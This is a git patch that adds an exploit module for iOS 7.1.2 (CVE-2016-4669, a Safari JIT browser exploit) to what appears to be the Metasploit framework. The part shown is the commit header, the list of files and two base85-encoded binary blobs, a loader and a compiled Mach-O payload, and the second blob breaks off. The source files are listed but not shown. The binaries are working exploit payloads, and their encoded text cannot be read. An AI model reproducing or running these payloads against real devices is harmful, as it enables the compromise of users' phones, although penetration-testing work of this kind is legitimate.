From 79adcf7904235fa98e0b5eef11bc64ab9edde983 Mon Sep 17 00:00:00 2001
From: Tim W <timrlw@gmail.com>
Date: Mon, 27 Jul 2020 14:08:37 +0800
Subject: [PATCH] Add module for iOS 7.1.2

---
 data/exploits/CVE-2016-4669/loader            |  Bin 0 -> 1024 bytes
 data/exploits/CVE-2016-4669/macho             |  Bin 0 -> 73436 bytes
 .../source/exploits/CVE-2016-4669/Makefile    |   23 +
 .../source/exploits/CVE-2016-4669/__task.h    |   49 +
 .../source/exploits/CVE-2016-4669/loader.c    |  190 +++
 .../source/exploits/CVE-2016-4669/macho.h     |   11 +
 .../source/exploits/CVE-2016-4669/macho.m     | 1020 +++++++++++++++++
 .../exploits/CVE-2016-4669/macho_to_bin.py    |   27 +
 .../source/exploits/CVE-2016-4669/offsets.h   |   35 +
 .../source/exploits/CVE-2016-4669/shell.h     |    8 +
 .../source/exploits/CVE-2016-4669/shell.m     |  171 +++
 external/source/exploits/CVE-2016-4669/task.c |  206 ++++
 .../source/exploits/CVE-2016-4669/utils.h     |   46 +
 .../source/exploits/CVE-2016-4669/utils.m     |  248 ++++
 .../exploits/apple_ios/browser/safari_jit.rb  |  549 +++++++++
 .../armle/meterpreter_reverse_http.rb         |    2 +-
 .../armle/meterpreter_reverse_https.rb        |    2 +-
 .../armle/meterpreter_reverse_tcp.rb          |    2 +-
 18 files changed, 2586 insertions(+), 3 deletions(-)
 create mode 100644 data/exploits/CVE-2016-4669/loader
 create mode 100644 data/exploits/CVE-2016-4669/macho
 create mode 100644 external/source/exploits/CVE-2016-4669/Makefile
 create mode 100644 external/source/exploits/CVE-2016-4669/__task.h
 create mode 100644 external/source/exploits/CVE-2016-4669/loader.c
 create mode 100644 external/source/exploits/CVE-2016-4669/macho.h
 create mode 100644 external/source/exploits/CVE-2016-4669/macho.m
 create mode 100644 external/source/exploits/CVE-2016-4669/macho_to_bin.py
 create mode 100644 external/source/exploits/CVE-2016-4669/offsets.h
 create mode 100644 external/source/exploits/CVE-2016-4669/shell.h
 create mode 100644 external/source/exploits/CVE-2016-4669/shell.m
 create mode 100644 external/source/exploits/CVE-2016-4669/task.c
 create mode 100644 external/source/exploits/CVE-2016-4669/utils.h
 create mode 100644 external/source/exploits/CVE-2016-4669/utils.m
 create mode 100644 modules/exploits/apple_ios/browser/safari_jit.rb

diff --git a/data/exploits/CVE-2016-4669/loader b/data/exploits/CVE-2016-4669/loader
new file mode 100644
index 0000000000000000000000000000000000000000..e468a1d6752196947deeb0738a534c1a7e59a6e3
GIT binary patch
literal 1024
zcmZ8eUr1A76hGhH-MrJeIhlVqO@%;F(jpQfVcO+hgu*E3CE|9S+Gf+uZGsA!5|KS*
zpZ4-?_Rq%(Y7Z4bltw*N5TOtC5QcA3FU_HIRJhK)n-U#3-}#;2@7(kK?!8LdQlz9U
zFeX9b?DL7I0qJTS>H-Ncn5c1vziDCyYGSSyj*?lz3{kUhs-t<CW8fwAwM!gx_d`7_
zRju;O80BKKKD#*8!7cL)D8FiCT=bex5P<^Y=}u?Dx#E7i$i+_fL!vO9S;H+}E-Hw4
z2O}+nepusKUVP%^<v21kfcL@(>Ol_Gof%-To@v3&^*@&k@t~|ZzZ<WnRWq*HYSx~5
z(f%>{%r1zPw32lsmxkV?iisdr&<f^G9<VPafsBfQ1mOf)BnfkQvrI16wW^$!7c-$^
znqzXA&RceQBl1S%OLcymWOwDoc;tEHOK1t3kR8-mQ%FmhBWka+JuF;5Xf;qlvP+dx
zSXxP2Rui&?+L)DEncG)D3s`%yUf(2$`P9X_(BG$2W=L?GshPp%M2(qNF>^GtwJ&3)
z<*aK12#5Q)=#&h#qz)&*iIdK`@^ensf$3^-#wga;m_*I?C$LVcWy~3M?RO_nap;^I
z6N&DN#HgHq-}ylB+P&8$kb&;OKhTvR@NWj?0oCshcpw}Jd4i)5QNtG$-(X(=22_t%
z(c5sZzYm(beS=y85Cx3DE6RX+-se%EAskUd5ojAwgGhP20XRC?I}(9T;Ic|<?_dvf
z@o?ie0UqY{^Ra$@|D!Pr83Gt67h9)E(`OFQEP#~=aAX_+Td*O1bqQ+@PhSM6&f!Oh
z8*<o-^UXPY5BWogak;*~29zDonxWk$YZ9&R*jIG>N|x^#_4gng?pE;KdwN6KbDjWx
zsNMMW&9aDBv?8Hd)xw2|m^7lMRU3A?2jtISHf41%156e<2w1QOe?ZmtA0AG9HC}0O
uOgmP_=bwabE#7$_*5v=Ad!_O1=CS!NZ40;eZb--9oi5()bp6<B+xQCzEj0W9

literal 0
HcmV?d00001

diff --git a/data/exploits/CVE-2016-4669/macho b/data/exploits/CVE-2016-4669/macho
new file mode 100644
index 0000000000000000000000000000000000000000..ddb0d1360f67178eb2080c1d11b9a0dbe344e02b
GIT binary patch
literal 73436
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
